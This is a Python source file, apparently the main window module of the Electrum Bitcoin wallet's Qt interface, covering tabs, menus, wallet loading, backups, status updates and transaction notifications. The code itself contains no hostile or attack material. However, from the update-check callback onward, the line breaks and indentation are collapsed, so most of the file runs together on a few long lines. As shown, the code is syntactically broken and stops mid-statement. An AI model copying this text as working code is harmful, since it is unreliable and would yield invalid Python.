from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
                   WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
                   OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
                   CloseButton, HelpButton, MessageBoxMixin, EnterButton,
                   import_meta_gui, export_meta_gui,
                   filename_field, address_field, char_width_in_lineedit, webopen,
                   TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
                   getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog

if TYPE_CHECKING:
    from . import ElectrumGui


LN_NUM_PAYMENT_ATTEMPTS = 10


class StatusBarButton(QToolButton):
    # note: this class has a custom stylesheet applied in stylesheet_patcher.py
    def __init__(self, icon, tooltip, func):
        QToolButton.__init__(self)
        self.setText('')
        self.setIcon(icon)
        self.setToolTip(tooltip)
        self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
        self.setAutoRaise(True)
        self.setMaximumWidth(25)
        self.clicked.connect(self.onPress)
        self.func = func
        self.setIconSize(QSize(25,25))
        self.setCursor(QCursor(Qt.PointingHandCursor))

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
            self.func()


def protected(func):
    '''Password request wrapper.  The password is passed to the function
    as the 'password' named argument.  "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        password = None
        while self.wallet.has_keystore_encryption():
            password = self.password_dialog(parent=parent)
            if password is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(password)
                break
            except Exception as e:
                self.show_error(str(e), parent=parent)
                continue

        kwargs['password'] = password
        return func(self, *args, **kwargs)
    return request_password


class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):

    payment_request_ok_signal = pyqtSignal()
    payment_request_error_signal = pyqtSignal()
    network_signal = pyqtSignal(str, object)
    #ln_payment_attempt_signal = pyqtSignal(str)
    alias_received_signal = pyqtSignal()
    computing_privkeys_signal = pyqtSignal()
    show_privkeys_signal = pyqtSignal()
    show_error_signal = pyqtSignal(str)

    payment_request: Optional[paymentrequest.PaymentRequest]

    def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
        QMainWindow.__init__(self)

        self.gui_object = gui_object
        self.config = config = gui_object.config  # type: SimpleConfig
        self.gui_thread = gui_object.gui_thread
        assert wallet, "no wallet"
        self.wallet = wallet
        if wallet.has_lightning():
            self.wallet.config.set_key('show_channels_tab', True)

        self.setup_exception_hook()

        self.network = gui_object.daemon.network  # type: Network
        self.fx = gui_object.daemon.fx  # type: FxThread
        self.contacts = wallet.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        self.cleaned_up = False
        self.payment_request = None  # type: Optional[paymentrequest.PaymentRequest]
        self.payto_URI = None
        self.checking_accounts = False
        self.qr_window = None
        self.pluginsdialog = None
        self.showing_cert_mismatch_error = False
        self.tl_windows = []
        self.pending_invoice = None
        Logger.__init__(self)

        self.tx_notification_queue = queue.Queue()
        self.tx_notification_last_time = 0

        self.create_status_bar()
        self.need_update = threading.Event()

        self.completions = QStringListModel()

        coincontrol_sb = self.create_coincontrol_statusbar()

        self.tabs = tabs = QTabWidget(self)
        self.send_tab = self.create_send_tab()
        self.receive_tab = self.create_receive_tab()
        self.addresses_tab = self.create_addresses_tab()
        self.utxo_tab = self.create_utxo_tab()
        self.console_tab = self.create_console_tab()
        self.contacts_tab = self.create_contacts_tab()
        self.channels_tab = self.create_channels_tab()
        tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
        tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
        tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))

        def add_optional_tab(tabs, tab, icon, description, name):
            tab.tab_icon = icon
            tab.tab_description = description
            tab.tab_pos = len(tabs)
            tab.tab_name = name
            if self.config.get('show_{}_tab'.format(name), False):
                tabs.addTab(tab, icon, description.replace("&", ""))

        add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
        add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
        add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
        add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
        add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")

        tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)

        central_widget = QWidget()
        vbox = QVBoxLayout(central_widget)
        vbox.setContentsMargins(0, 0, 0, 0)
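        # Central widget layout: the main tab bar stacked above the coin-control status bar.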
        vbox.addWidget(tabs)
        vbox.addWidget(coincontrol_sb)
        self.setCentralWidget(central_widget)

        if self.config.get("is_maximized"):
            self.showMaximized()

        self.setWindowIcon(read_QIcon("electrum.png"))
        self.init_menubar()

        wrtabs = weakref.proxy(tabs)
        QShortcut(QKeySequence("Ctrl+W"), self, self.close)
        QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
        QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
        QShortcut(QKeySequence("F5"), self, self.update_wallet)
        QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))

        for i in range(wrtabs.count()):
            QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))

        self.payment_request_ok_signal.connect(self.payment_request_ok)
        self.payment_request_error_signal.connect(self.payment_request_error)
        self.show_error_signal.connect(self.show_error)
        self.history_list.setFocus(True)

        # network callbacks
        if self.network:
            self.network_signal.connect(self.on_network_qt)
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'new_transaction', 'status', 'banner', 'verified',
                         'fee', 'fee_histogram', 'on_quotes', 'on_history',
                         'channel', 'channels_updated', 'payment_failed',
                         'payment_succeeded', 'invoice_status', 'request_status',
                         'ln_gossip_sync_progress', 'cert_mismatch', 'gossip_db_loaded']
            # To avoid leaking references to "self" that prevent the
            # window from being GC-ed when closed, callbacks should be
            # methods of this class only, and specifically not be
            # partials, lambdas or methods of subobjects.  Hence...
            util.register_callback(self.on_network, interests)
            # set initial message
            self.console.showMessage(self.network.banner)

        # update fee slider in case we missed the callback
        #self.fee_slider.update()
        self.load_wallet(wallet)
        gui_object.timer.timeout.connect(self.timer_actions)
        self.fetch_alias()

        # If the option hasn't been set yet
        if config.get('check_updates') is None:
            choice = self.question(title="Electrum - " + _("Enable update check"),
                                   msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
                                       _("Would you like to be notified when there is a newer version of Electrum available?"))
            config.set_key('check_updates', bool(choice), save=True)

        if config.get('check_updates', False):
            # The references to both the thread and the window need to be stored somewhere
            # to prevent GC from getting in our way.
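            # Runs in the GUI thread once UpdateCheckThread has fetched the latest release version.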
def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread() self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def setup_exception_hook(self): Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet) def run_coroutine_from_thread(self, coro, on_result=None): def task(): try: f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) r = f.result() if on_result: on_result(r) except Exception as e: self.logger.exception("exception in coro scheduled via window.wallet") self.show_error_signal.emit(str(e)) self.wallet.thread.add(task) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: # TODO would be nice if we just sent these to the crash reporter... 
# anything we don't want to send there, we should explicitly catch # send_exception_to_crash_reporter(e) try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(repr(e)) def on_network(self, event, *args): # Handle in GUI thread self.network_signal.emit(event, args) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread # note: all windows get events from all wallets! if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event == 'on_quotes': self.on_fx_quotes() elif event == 'on_history': self.on_fx_history() elif event == 'gossip_db_loaded': self.channels_list.gossip_db_loaded.emit(*args) elif event == 'channels_updated': wallet = args[0] if wallet == self.wallet: self.channels_list.update_rows.emit(*args) elif event == 'channel': wallet = args[0] if wallet == self.wallet: self.channels_list.update_single_row.emit(*args) self.update_status() elif event == 'request_status': self.on_request_status(*args) elif event == 'invoice_status': self.on_invoice_status(*args) elif event == 'payment_succeeded': wallet = args[0] if wallet == self.wallet: self.on_payment_succeeded(*args) elif event == 'payment_failed': wallet = args[0] if wallet == self.wallet: self.on_payment_failed(*args) elif event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': pass elif event == 'fee_histogram': self.history_model.on_fee_histogram() elif event == 'ln_gossip_sync_progress': self.update_lightning_icon() elif event == 'cert_mismatch': self.show_cert_mismatch_error() else: self.logger.info(f"unexpected network event: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') self.wallet.thread = None run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet: Abstract_Wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) if wallet.has_lightning(): util.trigger_callback('channels_updated', wallet) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.channels_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: 
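            # Sanity-check the wallet's derived addresses; any detected corruption is shown to the user and reported.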
wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.db.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum Testnet" if constants.net.TESTNET else "Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.db.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Bitcoins with it."), _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Bitcoin network. 
It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def select_backup_dir(self, b): name = self.config.get('backup_dir', '') dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name) if dirname: self.config.set_key('backup_dir', dirname) self.backup_dir_e.setText(dirname) def backup_wallet(self): d = WindowModalDialog(self, _("File Backup")) vbox = QVBoxLayout(d) grid = QGridLayout() backup_help = "" backup_dir = self.config.get('backup_dir') backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help) msg = _('Please select a backup directory') if self.wallet.has_lightning() and self.wallet.lnworker.channels: msg += '\n\n' + ' '.join([ _("Note that lightning channels will be converted to channel backups."), _("You cannot use channel backups to perform lightning payments."), _("Channel backups can only be used to request your channels to be closed.") ]) self.backup_dir_e = QPushButton(backup_dir) self.backup_dir_e.clicked.connect(self.select_backup_dir) grid.addWidget(backup_dir_label, 1, 0) grid.addWidget(self.backup_dir_e, 1, 1) vbox.addLayout(grid) vbox.addWidget(WWLabel(msg)) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return False backup_dir = self.config.get_backup_dir() if backup_dir is None: self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured")) return try: new_path = self.wallet.save_backup(backup_dir) except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) return msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path) self.show_message(msg, title=_("Wallet backup created")) return True def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.wallet.storage.path)) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), 
self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_wallet_info) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.export_invoices()) requests_menu = wallet_menu.addMenu(_("Requests")) requests_menu.addAction(_("Import"), lambda: self.import_requests()) requests_menu.addAction(_("Export"), lambda: self.export_requests()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.channels_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction if sys.platform == 'darwin': # "Settings"/"Preferences" are all reserved keywords in macOS. 
# preferences_action will get picked up based on name (and put into a standardized location, # and given a standard reserved hotkey) # Hence, this menu item will be at a "uniform location re macOS processes" preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences # Add another preferences item, to also have a "uniform location for Electrum between different OSes" tools_menu.addAction(_("Electrum preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network)) if self.network and self.network.local_watchtower: tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents) if not constants.net.TESTNET: help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().server.host self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_bitcoin_paper(self): filename = os.path.join(self.config.path, 'bitcoin.pdf') if not os.path.exists(filename): s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713") if not s: return s = s.split("0100000000000000")[1:-1] out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20] with open(filename, 'wb') as f: f.write(bytes.fromhex(out)) webopen('file:///' + filename) def show_update_check(self, version=None): 
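        # Open the update-check window; 'version' pre-fills the latest known release when it has already been fetched.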
self.gui_object._update_check = UpdateCheck(latest_version=version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''', _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: tx_wallet_delta = self.wallet.get_wallet_delta(tx) if not tx_wallet_delta.is_relevant: continue total_amount += tx_wallet_delta.delta self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: tx_wallet_delta = self.wallet.get_wallet_delta(tx) if not tx_wallet_delta.is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000) def timer_actions(self): self.request_list.refresh_status() # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() self.notify_transactions() def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str: """Formats amount as string, converting to desired unit. E.g. 500_000 -> '0.005' """ return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str: """Returns string with both bitcoin and fiat amounts, in desired units. E.g. 500_000 -> '0.005 BTC (191.42 EUR)' """ text = self.config.format_amount_and_units(amount_sat) fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None if text and fiat: text += f' ({fiat})' return text def format_fiat_and_units(self, amount_sat) -> str: """Returns string of FX fiat amount, in desired units. E.g. 
500_000 -> '191.42 EUR' """ return self.fx.format_amount_and_units(amount_sat) if self.fx else '' def format_fee_rate(self, fee_rate): return self.config.format_fee_rate(fee_rate) def get_decimal_point(self): return self.config.get_decimal_point() def base_unit(self): return self.config.get_base_unit() def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. 
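            # While syncing, the status text shows answered/sent address-history request counts.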
if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance") + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) if self.wallet.has_lightning(): l = self.wallet.lnworker.get_balance() text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) if self.status_button: self.status_button.setIcon(icon) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.channels_list.update_rows.emit(wallet) self.update_completions() def create_channels_tab(self): self.channels_list = ChannelsList(self) t = self.channels_list.get_toolbar() return self.create_list_tab(self.channels_list, t) def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_history', False)) l.show_toolbar(toolbar_shown) return 